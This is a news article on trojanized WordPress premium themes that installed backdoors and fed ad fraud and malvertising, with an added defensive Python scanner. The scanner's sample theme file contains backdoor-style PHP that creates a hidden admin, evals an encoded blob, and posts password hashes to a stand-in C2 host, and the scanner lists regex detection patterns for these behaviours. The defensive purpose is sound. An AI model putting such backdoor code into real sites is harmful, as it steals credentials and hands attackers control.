Over 20,000 WordPress Sites Run Trojanized Premium Themes
The Content Management System (CMS) WordPress is very popular with private
individuals as well as with companies: it makes it easier and faster to
implement and maintain your own professional-looking website and to expand
it with suitable plugins. This popularity makes WordPress interesting
for cyber gangsters too. Security researchers have now published their
findings on a campaign that has been running since 2017, in the course
of which criminals managed to inject malicious code onto at least tens
of thousands of web servers worldwide.

The cyber gangsters hid the code in so-called "Premium Themes" for
WordPress. A theme is a kind of template that specifies the design,
layout and also part of the functionality of the website. The "Premium"
editions of such themes are usually paid for and are supposed to be
distinguished from the free versions by more professional programming
along with design, features etc. The downside is that a ready-made theme
brings with it a large number of scripts and other (confusing) files,
which their buyers seldom examine.
Stolen themes with unwanted extras
This played into the hands of the criminals. According to the research team
of the IT security company Prevailion, they offered contaminated premium
themes on around 30 platforms that they had set up for this purpose.
Their main advertising pitch was apparently that they offered premium
themes - probably stolen from other platforms and developers - for free.
From the platforms, the themes are said to have landed on at least 20,000
web servers; the research team - or the search engine for compromise
indicators operated by Prevailion - was able to attribute a fifth of
these to small and medium-sized companies from all over the world.
Backdoor, ad fraud and malvertising
As the team from Prevailion reports in a blog entry, anyone who installed
one of the prepared premium themes unwittingly installed a backdoor along
with it. Through this backdoor the criminals could add admin accounts, but
could also read out the email addresses and WordPress password hashes of
the existing admins. The prepared themes also loaded additional (malicious)
code from command-and-control servers.
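The behaviour described above (an admin account that the site owner never created, theme code that pulls further code from a remote server, and a read-out of password hashes) leaves traces that a site operator can look for. The following is an added example and is not code from the article or from Prevailion: two small defender-side checks in Python, a heuristic scan of theme PHP source for patterns that a legitimate theme has no reason to contain, and a comparison of the administrator accounts actually present against the list the owner expects. The indicator names, regular expressions, file contents and user rows are all constructed for this example and are not a published ruleset.

```python
"""Added example (not from the article or from Prevailion): two defender-side
checks for a WordPress install that may carry a trojanized theme.

1. scan_theme_files(): flags PHP files whose source contains patterns that
   commonly appear in theme backdoors (eval over a decoded blob, code loaded
   from a remote URL, user creation from inside a theme, password hashes
   handed to an outbound call).
2. audit_admins(): reports administrator accounts that the site owner did
   not expect to exist.

All regexes, file contents and user rows below are constructed sample data.
"""
import re

# Heuristic indicators; the names and patterns are this example's own choice.
INDICATORS = {
    "obfuscated_eval": re.compile(
        r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(", re.I),
    "remote_code_load": re.compile(
        r"(file_get_contents|curl_init|fopen|include|require)(_once)?\s*\(\s*['\"]https?://", re.I),
    "user_creation_in_theme": re.compile(
        r"\b(wp_insert_user|wp_create_user)\s*\(", re.I),
    # a read of user_pass followed later in the file by an outbound call
    "hash_exfil": re.compile(
        r"\buser_pass\b.*\b(mail|curl|wp_remote_post)\b", re.I | re.S),
}


def scan_theme_files(files):
    """files: dict of relative path -> PHP source text.
    Returns {path: [indicator names]} containing only files with hits."""
    findings = {}
    for path, source in files.items():
        hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
        if hits:
            findings[path] = hits
    return findings


def audit_admins(user_rows, expected_admin_logins):
    """user_rows: iterable of dicts with 'user_login' and 'role'.
    Returns, sorted, the logins holding 'administrator' that are not in
    expected_admin_logins."""
    expected = set(expected_admin_logins)
    return sorted(
        row["user_login"] for row in user_rows
        if row["role"] == "administrator" and row["user_login"] not in expected
    )


# Constructed sample theme: one benign file, one carrying backdoor-style code.
SAMPLE_THEME = {
    "functions.php": (
        "<?php\n"
        "add_action('wp_enqueue_scripts', function () {\n"
        "    wp_enqueue_style('main', get_stylesheet_uri());\n"
        "});\n"
    ),
    "inc/class-tgm.php": (
        "<?php\n"
        "$u = wp_insert_user(['user_login' => 'support', 'role' => 'administrator', 'user_pass' => 'x']);\n"
        "eval(base64_decode('ZWNobyAxOw=='));\n"
        "$c = file_get_contents('http://c2.example.invalid/p.txt');\n"
        "$rows = $wpdb->get_results('SELECT user_email, user_pass FROM wp_users');\n"
        "wp_remote_post('http://c2.example.invalid/', ['body' => $rows]);\n"
    ),
}

# Constructed sample user rows; the owner knows only 'alice' should be an admin.
SAMPLE_USERS = [
    {"user_login": "alice", "role": "administrator"},
    {"user_login": "bob", "role": "editor"},
    {"user_login": "support", "role": "administrator"},
]

if __name__ == "__main__":
    for path, hits in scan_theme_files(SAMPLE_THEME).items():
        print(f"{path}: {', '.join(hits)}")
    print("unexpected admins:", audit_admins(SAMPLE_USERS, ["alice"]))
```

On a real install the file dictionary would be filled by walking `wp-content/themes/<theme>/` and the user rows would come from `wp_users` joined with the capabilities entry in `wp_usermeta`; the patterns are deliberately broad, so every hit needs a human to read the surrounding code before anything is deleted.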
Prevailion has created a list of 30 fake shops with the infected themes.
The websites with the prepared themes were integrated into the "Propeller
Ads" advertising network. Visitors were shown advertisements; every
click on such an advertisement put a little money in the gangsters'
coffers. According to the researchers' observations, the advertising
network not only played advertisements, but also showed website visitors
requests to update certain (supposedly outdated) software components.
The blog entry does not reveal which malware users downloaded to their
computers by clicking on the prompts. However, another team of
researchers had recently observed how "Propeller Ads" redirected
visitors to other domains on which the exploit kit "Fallout" was
lurking. Using security gaps in Flash and Windows, Fallout previously
placed the GandCrab ransomware (now no longer active) on vulnerable
computers.
Better to be on the safe side
If you plan to install a premium theme in the future, you should look for
reputable offers on the official WordPress website or on well-known platforms
instead of risking the security of your web server, and also that of the
site's visitors, for a relatively small amount of money.